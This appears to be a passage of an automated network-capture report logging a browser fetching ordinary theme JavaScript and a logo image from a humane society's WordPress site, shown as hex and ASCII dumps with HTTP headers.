                                                                                                                                                                                                                                                        Data Ascii: !function(){var t={5560:function(t){var e;e=ThriveTheme.$,t.exports={isOnScreen:function(){let t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:["top","right","bottom","left"];t="string"==typeof t?[t]:t;const i=e(window),s={top:i.scrollTop(),left:
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 74 6f 70 7c 7c 73 2e 74 6f 70 3e 6f 2e 62 6f 74 74 6f 6d 29 7d 7d 29 29 2c 6e 7d 7d 7d 2c 35 35 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 28 65 3d 3e 7b 63 6f 6e 73 74 20 73 3d 69 28 38 39 39 39 29 2c 6f 3d 22 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 22 3b 63 6c 61 73 73 20 6e 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 29 7b 74 68 69 73 2e 24 66 6f 72 6d 3d 74 2c 74 68 69 73 2e 61 64 64 45 72 72 6f 72 46 69 65 6c 64 73 28 29 2c 74 68 69 73 2e 24 66 6f 72 6d 2e 73 75 62 6d 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 2e 73 75 62 6d 69 74 41 63 74 69 6f 6e 28 74 2c 65 28 74 68 69 73 29 29 7d 29 29 7d 61 64 64 45 72 72 6f 72 46 69 65 6c 64 73 28 29 7b 74 68 69 73 2e 24 66 6f 72 6d 2e 66 69 6e 64 28 22 3a 69 6e 70 75 74 3a 76 69 73 69 62 6c
                                                                                                                                                                                                                                                        Data Ascii: top||s.top>o.bottom)}})),n}}},551:function(t,e,i){(e=>{const s=i(8999),o=".error-message";class n{constructor(t){this.$form=t,this.addErrorFields(),this.$form.submit((function(t){n.submitAction(t,e(this))}))}addErrorFields(){this.$form.find(":input:visibl
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 61 75 64 69 6f 22 29 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 22 29 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 70 6c 61 79 28 29 3b 6e 75 6c 6c 21 3d 3d 74 26 26 74 2e 63 61 74 63 68 28 28 28 29 3d 3e 7b 74 68 69 73 2e 70 6c 61 79 28 29 7d 29 29 7d 7d 29 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 27 69 66 72 61 6d 65 5b 64 61 74 61 2d 70 72 6f 76 69 64 65 72 3d 22 73 6f 75 6e 64 63 6c 6f 75 64 22 5d 5b 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 3d 22 31 22 5d 27 29 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 67 65 74 41
                                                                                                                                                                                                                                                        Data Ascii: is.$element.find("audio").each((function(){if(this.hasAttribute("data-autoplay")){const t=this.play();null!==t&&t.catch((()=>{this.play()}))}})),this.$element.find('iframe[data-provider="soundcloud"][data-autoplay="1"]').each((function(){const t=this.getA
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 3d 3d 3d 65 7c 7c 22 73 65 6c 66 22 3d 3d 3d 65 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 67 65 74 28 30 29 3b 65 2e 6d 75 74 65 64 3d 21 30 2c 65 2e 70 61 75 73 65 64 26 26 65 2e 70 6c 61 79 28 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 67 65 74 44 61 74 61 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 60 64 61 74 61 2d 24 7b 74 7d 60 29 7d 73 74 61 74 69 63 20 69 6e 73 74 61 6e 63 65 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 69 28 74 29 7d 7d 74 2e 65 78 70 6f 72 74 73 3d 69 7d 29 28 54 68 72 69 76 65 54 68 65 6d 65 2e 24 29 7d 2c 37 34 33 36 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 65 3d 3e 7b 63 6c 61 73 73 20 69 20 65 78 74 65 6e 64 73 20 54 43 42 5f 46 72 6f 6e 74 2e 50 61 67 69 6e 61 74 69 6f 6e 7b 63 6f
                                                                                                                                                                                                                                                        Data Ascii: ===e||"self"===e){const e=t.get(0);e.muted=!0,e.paused&&e.play()}return this}}getData(t){return this.$element.attr(`data-${t}`)}static instance(t){return new i(t)}}t.exports=i})(ThriveTheme.$)},7436:function(t){(e=>{class i extends TCB_Front.Pagination{co
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 69 73 2e 70 6f 73 74 43 6f 6e 74 65 6e 74 4f 66 66 73 65 74 54 6f 70 3d 74 68 69 73 2e 24 70 6f 73 74 43 6f 6e 74 65 6e 74 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 26 26 6e 65 77 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 69 6e 69 74 69 61 6c 53 74 61 74 65 2e 62 69 6e 64 28 74 68 69 73 29 29 2e 6f 62 73 65 72 76 65 28 74 68 69 73 2e 24 70 6f 73 74 43 6f 6e 74 65 6e 74 5b 30 5d 29 2c 74 68 69 73 2e 69 6e 69 74 28 29 29 29 7d 69 6e 69 74 28 29 7b 74 68 69 73 2e 69 6e 69 74 69 61 6c 53 74 61 74 65 28 29 2c 69 2e 74 76 65 5f 66 72 6f 6e 74 65 6e 64 5f 6f 70 74 69 6f 6e 73 2e 69 73 5f 65 64 69 74 6f 72 5f 70 61 67 65 7c 7c 28 74 68 69 73
                                                                                                                                                                                                                                                        Data Ascii: is.postContentOffsetTop=this.$postContent.offset().top,"undefined"!=typeof ResizeObserver&&new ResizeObserver(this.initialState.bind(this)).observe(this.$postContent[0]),this.init()))}init(){this.initialState(),i.tve_frontend_options.is_editor_page||(this
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 28 72 2e 63 73 73 28 22 74 6f 70 22 29 29 3e 3d 6e 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 7d 65 6c 73 65 20 74 3d 30 21 3d 3d 74 68 69 73 2e 73 63 72 6f 6c 6c 54 6f 70 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 73 68 6f 77 22 2c 74 29 7d 73 65 74 50 72 6f 67 72 65 73 73 28 74 29 7b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 76 61 6c 75 65 22 2c 74 29 7d 73 65 74 43 6f 75 6e 74 64 6f 77 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 24 63 6f 75 6e 74 64 6f 77 6e 2e 6c 65 6e 67 74 68 29 7b 63 6f 6e 73 74 20 65 3d 30 3d 3d 3d 74 3f 74 68 69 73 2e 74 6f 74 61 6c 4d 69 6e 75 74 65 73 3a 74 68 69 73 2e 74 6f 74 61 6c 4d 69 6e 75 74 65 73 2d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 74 6f 74 61 6c 4d 69 6e
                                                                                                                                                                                                                                                        Data Ascii: (r.css("top"))>=n.offset().top}else t=0!==this.scrollTop;this.$element.toggleClass("show",t)}setProgress(t){this.$element.attr("value",t)}setCountdown(t){if(this.$countdown.length){const e=0===t?this.totalMinutes:this.totalMinutes-Math.floor(this.totalMin
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 22 22 29 7b 63 61 73 65 22 73 74 69 63 6b 79 22 3a 74 3d 72 2e 64 65 66 61 75 6c 74 53 65 74 74 69 6e 67 73 3b 62 72 65 61 6b 3b 63 61 73 65 22 6f 66 66 2d 73 63 72 65 65 6e 22 3a 74 3d 6c 2e 64 65 66 61 75 6c 74 53 65 74 74 69 6e 67 73 3b 62 72 65 61 6b 3b 63 61 73 65 22 64 69 73 70 6c 61 79 2d 74 79 70 65 22 3a 74 3d 7b 64 65 73 6b 74 6f 70 3a 22 6e 6f 72 6d 61 6c 22 7d 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 3d 7b 7d 7d 72 65 74 75 72 6e 20 74 7d 73 74 61 74 69 63 20 67 65 74 20 69 6e 45 64 69 74 6f 72 28 29 7b 72 65 74 75 72 6e 21 21 6f 2e 74 76 65 5f 66 72 6f 6e 74 65 6e 64 5f 6f 70 74 69 6f 6e 73 2e 69 73 5f 65 64 69 74 6f 72 5f 70 61 67 65 7d 63 6f 6e 73 74 72 75
                                                                                                                                                                                                                                                        Data Ascii: arguments[0]?arguments[0]:""){case"sticky":t=r.defaultSettings;break;case"off-screen":t=l.defaultSettings;break;case"display-type":t={desktop:"normal"};break;default:t={}}return t}static get inEditor(){return!!o.tve_frontend_options.is_editor_page}constru
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 73 29 7d 63 61 74 63 68 28 65 29 7b 73 3d 61 2e 67 65 74 44 65 66 61 75 6c 74 56 61 6c 75 65 73 28 74 29 7d 72 65 74 75 72 6e 20 65 26 26 28 73 3d 73 5b 65 5d 29 2c 69 26 26 28 73 3d 74 68 69 73 2e 67 65 74 43 6f 6e 66 69 67 42 79 44 65 76 69 63 65 28 73 2c 69 29 29 2c 73 7d 67 65 74 43 6f 6e 66 69 67 42 79 44 65 76 69 63 65 28 74 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 73 2e 67 65 74 44 69 73 70 6c 61 79 54 79 70 65 28 29 3b 63 6f 6e 73 74 20 69 3d 74 68 69 73 2e 67 65 74 44 69 73 70 6c 61 79 54 79 70 65 28 65 29 2c 6f 3d 5b 65 5d 3b 66 6f 72 28 22 6d 6f 62 69 6c 65 22 3d 3d 3d 65 26 26 69 3d 3d 3d 74 68 69
                                                                                                                                                                                                                                                        Data Ascii: s)}catch(e){s=a.getDefaultValues(t)}return e&&(s=s[e]),i&&(s=this.getConfigByDevice(s,i)),s}getConfigByDevice(t){let e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:s.getDisplayType();const i=this.getDisplayType(e),o=[e];for("mobile"===e&&i===thi
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 6f 6e 44 61 74 61 28 22 73 74 69 63 6b 79 22 2c 22 76 69 73 69 62 6c 65 4f 6e 22 29 2e 69 6e 63 6c 75 64 65 73 28 74 29 26 26 28 69 3d 22 73 74 69 63 6b 79 22 29 3a 69 3d 65 5b 74 5d 2c 69 7c 7c 28 69 3d 22 6d 6f 62 69 6c 65 22 3d 3d 3d 74 26 26 65 2e 74 61 62 6c 65 74 3f 65 2e 74 61 62 6c 65 74 3a 65 2e 64 65 73 6b 74 6f 70 29 2c 22 73 74 69 63 6b 79 22 3d 3d 3d 69 26 26 22 6d 6f 62 69 6c 65 22 3d 3d 3d 74 26 26 28 69 3d 22 73 74 69 63 6b 79 22 3d 3d 3d 65 2e 74 61 62 6c 65 74 3f 22 73 74 69 63 6b 79 22 3d 3d 3d 65 2e 64 65 73 6b 74 6f 70 3f 22 6e 6f 72 6d 61 6c 22 3a 65 2e 64 65 73 6b 74 6f 70 3a 65 2e 74 61 62 6c 65 74 29 2c 69 7d 6f 66 66 53 63 72 65 65 6e 52 65 66 72 65 73 68 28 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68
                                                                                                                                                                                                                                                        Data Ascii: onData("sticky","visibleOn").includes(t)&&(i="sticky"):i=e[t],i||(i="mobile"===t&&e.tablet?e.tablet:e.desktop),"sticky"===i&&"mobile"===t&&(i="sticky"===e.tablet?"sticky"===e.desktop?"normal":e.desktop:e.tablet),i}offScreenRefresh(){let t=arguments.length
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 21 30 2c 6d 6f 62 69 6c 65 3a 21 31 7d 2c 76 69 73 69 62 6c 65 49 6e 45 64 69 74 6f 72 3a 21 30 2c 68 61 73 4f 76 65 72 6c 61 79 3a 7b 64 65 73 6b 74 6f 70 3a 21 31 7d 2c 68 61 73 44 65 66 61 75 6c 74 54 72 69 67 67 65 72 3a 7b 64 65 73 6b 74 6f 70 3a 21 30 7d 2c 68 61 73 43 6c 6f 73 65 49 63 6f 6e 3a 7b 64 65 73 6b 74 6f 70 3a 21 30 7d 2c 73 69 64 65 62 61 72 57 69 64 74 68 3a 6e 75 6c 6c 2c 74 72 69 67 67 65 72 50 6f 73 69 74 69 6f 6e 3a 7b 64 65 73 6b 74 6f 70 3a 22 63 65 6e 74 65 72 22 7d 2c 63 6f 6c 6c 61 70 73 65 64 49 63 6f 6e 3a 22 69 63 6f 6e 2d 6d 65 6e 75 2d 6c 65 66 74 2d 73 6f 6c 69 64 22 2c 65 78 70 61 6e 64 65 64 49 63 6f 6e 3a 22 69 63 6f 6e 2d 6d 65 6e 75 2d 72 69 67 68 74 2d 73 6f 6c 69 64 22 2c 63 6c 6f 73 65 49 63 6f 6e 3a 22 69 63 6f
                                                                                                                                                                                                                                                        Data Ascii: !0,mobile:!1},visibleInEditor:!0,hasOverlay:{desktop:!1},hasDefaultTrigger:{desktop:!0},hasCloseIcon:{desktop:!0},sidebarWidth:null,triggerPosition:{desktop:"center"},collapsedIcon:"icon-menu-left-solid",expandedIcon:"icon-menu-right-solid",closeIcon:"ico


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        31192.168.2.449781192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC628OUTGET /wp-content/uploads/2023/05/Logo_Horiz.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC594INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:11 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 10839
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2023/05/Logo_Horiz.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Tue, 30 May 2023 00:03:54 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:11 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC775INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 b1 00 00 00 bd 08 06 00 00 00 65 09 fa bf 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 da ed dd 4d 6e 22 c9 da f6 f1 ab 4b 35 b7 df 15 98 23 21 31 40 c8 f4 84 a9 b3 26 4c 8b b3 02 53 2b 28 6a 05 85 57 d0 d4 0a 0a af a0 f1 94 49 a5 a7 4c 1a 84 18 20 21 1d bc 82 c7 ac a0 de 41 de d9 4d bb fc c1 47 44 66 64 f2 ff 49 d6 79 9e 73 ca 38 c9 8c 8c 8c 2b 22 32 e2 b7 9f 3f 7f aa 6c 96 d5 c6 b9 a4 8e a4 a6 fd a4 d6 92 a6 92 e2 da 6a 3e 2d f0 f7 6b da f7 8b 9e f9 9f 63 49 a3 22 7f 3f 00 00 00 00 78 c9 6f 65 0a b1 16 5e 07 16 f0 ce de f8 e7 0f 92 fa b5 d5 7c 58 a0 ef d7 95 d4 97 74 b1 c3 3f bf b7 ef 17 53 cc 01 00 00 00 10 62 c3 0b 78 1d 49 c3 1d c2 eb 73 61 b6 57 5b
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRepHYs.#.#x?v IDATxMn"K5#!1@&LS+(jWIL !AMGDfdIys8+"2?lj>-kcI"?xoe^|Xt?SbxIsaW[
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: b5 c1 28 ec af e7 24 92 94 96 b9 47 2b 6b 31 67 06 00 00 00 c0 ab 21 d6 16 f9 e9 4b ba 7e 21 6c 6c 24 8d 24 0d 09 19 3a 5b 56 1b d1 01 e7 21 a2 d8 fd 1d e6 bb 7a 61 54 da ca da 40 d2 a0 b6 9a 3f 72 c6 00 00 00 00 48 5b d3 89 6d db 98 e9 4b 01 36 0d 6e f6 bf ff 58 56 1b b1 8d a0 9d b2 43 be 7f f3 94 4f d8 b2 da e8 2c ab 8d b5 a4 3f f5 fa b4 ea 33 49 5f 25 c5 36 33 00 00 00 00 00 92 10 6b 23 b0 b1 f6 5b 31 f7 ca c2 ec 30 c3 90 b1 2e 41 88 bd 3a d1 f0 5a 59 56 1b b1 85 d7 7d f6 a7 bd 24 c8 02 00 00 00 f8 57 88 95 34 d4 e1 5b be 5c 4b 5a 67 34 2a 1b 5a 88 dd 6b 54 d5 46 bb 43 e3 7d aa ae ad e4 3c 3d 22 c0 5f ea c8 bd 79 01 00 00 00 94 24 c4 da 28 ec b1 a3 83 67 4a 46 65 7d 07 8d d0 de 8d 3c b3 f3 b7 ab 4a 68 05 c0 f7 62 5d cb 6a 63 28 e9 bb 8e df 17 b7 c7 68
                                                                                                                                                                                                                                                        Data Ascii: ($G+k1g!K~!ll$$:[V!zaT@?rH[mK6nXVCO,?3I_%63k#[10.A:ZYV}$W4[\KZg4*ZkTFC}<="_y$(gJFe}<Jhb]jc(h
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 70 b8 35 6a 7c ec 88 ec 4d 6d 35 8f 3c 4e c1 cd 2a 7c f5 0e d9 ba a8 48 65 93 95 8a 01 00 00 00 0f 21 d6 f4 e5 ef dd d2 cc 58 20 6f 2a 79 07 75 df bd 64 bf 29 19 dd 5c 7b 3c be c7 da 6a 1e e9 b0 77 64 ef 25 fd ee 6a 15 e2 9c dd 06 36 8d 58 ca 6e 04 1a 00 00 00 c0 b1 21 d6 46 f5 3a 07 04 bf 10 83 ec a3 05 bd 8a a4 2f 6f 84 f3 07 0b af ff a9 ad e6 99 2d 30 64 c7 f7 1f fb db af 9d f3 8d 92 ad 84 3e d8 e8 eb b4 04 65 71 26 de 17 05 00 00 00 f0 86 f7 3b 04 ab f5 b2 da 88 24 fd 55 86 2f 6c 81 74 60 3f b2 ef b6 6d 9d e7 74 56 fb db 3d 49 bd 65 b5 d1 b4 d0 9d 4e 69 9d da f1 4d 4b 56 0e 7d bd 6f ec c2 23 d5 04 00 00 00 50 a0 10 6b c1 6a ba ac 36 3e 49 fa 5e b6 a0 e0 62 bb 1c 8f c7 36 b5 e0 1a c2 fe a2 1b b9 5d e0 a8 08 01 36 ed 38 70 6a d2 ae c7 02 00 00 00 70 90
                                                                                                                                                                                                                                                        Data Ascii: p5j|Mm5<N*|He!X o*yud)\{<jwd%j6Xn!F:/o-0d>eq&;$U/lt`?mtV=IeNiMKV}o#Pkj6>I^b6]68pjp
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 6b 3a 69 d7 7b 9e 8e 71 f0 46 47 ce 4e 26 ed 7a 94 63 79 9a 49 ea 1d 50 27 54 ac 4e e8 3a a8 03 ff de 33 de 45 dd 6f 65 a7 77 8a cf a5 17 42 45 a4 64 36 a0 4f f7 69 f0 b0 f0 f1 e8 f1 7b b9 6a f7 0c ac 5e a7 dd 73 dc bd d6 b5 73 e1 6b 40 ee 6e eb 59 b4 77 b9 ca 2d c4 2e ab 8d 9e a4 3f 88 2a 04 d9 82 dc cc 2e 6e 94 fb 7d 1a 34 0e 1b 32 69 65 da dd a5 31 63 95 f8 50 6f f7 6a 1f f3 40 ec 87 38 cd d6 82 e4 50 fe 67 50 fc 72 3d 72 0c b1 b1 a3 6b fd 20 a9 93 75 ef b3 a3 7b f3 66 d2 ae f7 43 0d b1 16 5e 7d 6d 37 f7 60 f7 e3 30 e3 fb ec 87 8b ba e4 90 90 98 e5 7d 31 69 d7 7f cb b1 3c a5 6e 2d cc 3e be f1 77 cf ad f1 7f ed e9 d2 ef 74 1c af 94 99 be c7 e7 d2 37 bb 0f 82 7d 65 ca 61 27 96 8b ce 91 58 8e 46 fb 4f a8 dd d3 2b c2 e8 ac 75 e2 77 3d 9e 8b 97 72 c5 de 9d
                                                                                                                                                                                                                                                        Data Ascii: k:i{qFGN&zcyIP'TN:3EoewBEd6Oi{j^ssk@nYw-.?*.n}42ie1cPoj@8PgPr=rk u{fC^}m7`0}1i<n->wt7}ea'XFO+uw=r
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 92 1e 3c fd cd b3 f4 dd 58 2f 23 b1 36 0a cb 7b 67 a7 ad 47 a3 c7 9b a1 b2 99 e5 f0 60 95 df d4 1e 22 db 15 63 53 c9 34 d1 8e fc ad a6 d8 71 58 a1 77 e5 af 17 f7 5e 49 2f 71 3c 69 d7 a7 cf 3c 44 22 fb 2e 3e 8f c1 79 a3 a1 35 5e 7c 13 a3 04 a1 99 d9 fd 3f b5 fb f2 f1 c9 3d 59 b1 b2 d6 f1 50 d6 ce 5a e3 45 67 d2 ae 8f b8 0c b9 c9 6a 5f d7 bf cb d9 76 dd 6f 65 2c ad cf f2 9a 02 7b 67 f5 ed 34 ad 6f ad a1 de f4 5c cf 46 8e c3 80 ef d7 ed 66 4a 46 34 a7 fa 67 54 7f aa 64 66 4c e5 c9 f7 aa d8 f9 0b 79 ba 69 56 5b 0f 3d 5b f6 0b da ee f1 55 ce ee ed 1c 8d b6 9f 41 2f 84 e8 8a dd 93 3d c7 f7 65 47 d2 e8 b7 9f 3f 7f fa 08 b1 43 42 2c 24 fd a7 b6 9a af cb f0 45 5a e3 85 8b 1b e5 7e d2 ae 47 01 1d cf 6b e1 b5 fb b4 02 7f a3 92 1a 78 aa d4 7f 7f 2e 18 1e 70 be d6 1e
                                                                                                                                                                                                                                                        Data Ascii: <X/#6{gG`"cS4qXw^I/q<i<D".>y5^|?=YPZEgj_voe,{g4o\FfJF4gTdfLyiV[=[UA/=eG?CB,$EZ~Gkx.p
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: d0 e8 a3 fd 7c 6f 8d 17 33 2b 83 e9 cf e3 73 b3 7c 6c e6 41 c5 b2 61 c7 c3 73 c7 79 88 05 5e c2 bb d2 28 72 88 f5 de d8 9b b4 eb 8f 39 3f f8 40 48 06 10 7e b8 88 39 95 78 85 ef 41 a3 4b fb b9 de 0a ac 59 7f c7 db b4 13 ce e5 74 e2 2b ca 0e 80 12 ca aa e7 fb 9e 53 0d 00 a5 54 e1 14 00 4e f4 d3 ff e3 1d e7 02 00 5e c5 e8 15 00 20 f7 10 9b c1 22 83 40 c8 6e b6 df 71 27 c4 02 00 00 00 00 42 35 9b b4 eb fd ed ff 82 10 0b 00 28 24 d7 cb ff 03 00 80 e0 6c f4 cc 02 c2 84 58 00 40 51 b1 f2 39 00 00 25 0f b0 cf ad a8 4e 88 05 80 d7 45 19 fd 9d 0a a7 1a 00 f0 92 d6 78 91 45 c7 1d 9d 83 08 c5 4c 52 f3 b9 6d 7c 08 b1 c8 0a ab ae 22 0f 45 db 4f ef 82 4b 46 f0 07 c0 f3 e8 15 59 bc 42 c1 6b 1a 08 c1 37 25 23 b0 eb 97 fe 81 cb 7d 62 1f 68 84 01 08 88 ab 55 85 23 df 07 9a
                                                                                                                                                                                                                                                        Data Ascii: |o3+s|lAasy^(r9?@H~9xAKYt+STN^ "@nq'B5($lX@Q9%NExELRm|"EOKFYBk7%#}bhU#
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 84 19 48 1a b9 d8 42 c7 ea e2 a6 92 4e f8 e8 8d e7 fd a5 d7 10 5b 5b cd 1f 97 d5 86 8f 51 0f 14 cb 90 53 00 87 0d 87 ca 31 95 a5 35 98 5d f6 4a 86 ea 63 6b bc e8 4e da f5 a1 87 fb d9 47 a3 2b a4 0e 80 53 30 75 74 0f 44 8e 1a a7 be 66 48 fc 69 01 79 a4 5f 17 90 aa ec d0 50 72 a9 c3 f3 b0 54 5c 5c cf a1 05 8c b2 0f f6 f4 5b e3 45 ec 70 5f 68 da 3d fb b5 7b 62 4f ed 9e 0b 6b 0f fc 61 81 76 ba f5 93 76 f0 ac ad 03 bc a9 7f 8f 9e 56 9e fc 1c 75 6c ef 3d 9d 7c 9f a3 1e 20 c4 e2 f4 0c 74 fc 56 1a 3d 49 7f 9d c0 b9 fa 6e d3 7e d2 87 ca b9 83 50 7b 2a 8d ae b2 73 35 22 d8 6b 8d 17 23 07 8d 53 9f 1d de 67 81 b4 43 d2 73 c5 68 6c 49 9e 45 ad f1 62 7a 4c d9 b7 57 5c fa 2a ff 8a c0 e9 1a 08 69 67 52 6c cf 23 66 e9 95 a7 dd 73 61 3f bf 4c 4f cf a2 53 fa 9d 8f 0f ad ad
                                                                                                                                                                                                                                                        Data Ascii: HBN[[QS15]JckNG+S0utDfHiy_PrT\\[Ep_h={bOkavvVul=| tV=In~P{*s5"k#SgCshlIEbzLW\*igRl#fsa?LOS
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: ee 1d 02 62 bf 35 5e a4 c7 51 91 74 f5 4a e5 bf b6 32 b2 ce b2 ac 6c bd 73 96 1e 6b 64 3f 97 07 7e e4 9d 92 a9 43 a3 5d 42 7f 8e d6 8e ea 88 c7 9c ee c9 58 52 64 65 bd 6b 65 6c 9f e7 f4 bd 9d 83 d8 c3 b1 ad 25 75 5b e3 45 6f eb 3e 8c 24 9d 1d 78 2f c6 92 86 fb 76 86 4c da f5 61 6b bc 88 ad 7c 77 0e fc fb 2e ae 73 e8 75 7f 61 ee 03 1b ed 1c b5 c6 8b b4 cc 7f 3c f0 fb c6 f2 b8 f8 d1 0b f5 ea be f7 a8 93 3a d5 7e e7 e9 fd 58 79 a5 8e 9f d9 f5 8c 1d 3c 8f 68 f7 64 b0 d8 9c d5 b9 69 79 6b 6e d5 b9 57 9e 43 eb 34 fd 8e bb d6 cf bf fd fc f9 33 d3 0b b9 ac 36 22 49 3f c8 7e a5 30 ab ad e6 4d 4e 03 8e d1 1a 2f ce 25 35 ad 92 94 92 8d ac 9b f6 c0 5b 6f 35 6a a6 92 a6 79 87 99 d6 78 11 d9 43 7b fb e7 e9 83 36 7d 68 4f 03 0f 5f 59 9f b7 f4 da be 15 08 d7 fb ec 4f d8
                                                                                                                                                                                                                                                        Data Ascii: b5^QtJ2lskd?~C]BXRdekel%u[Eo>$x/vLak|w.sua<:~Xy<hdiyknWC436"I?~0MN/%5[o5jyxC{6}hO_YO
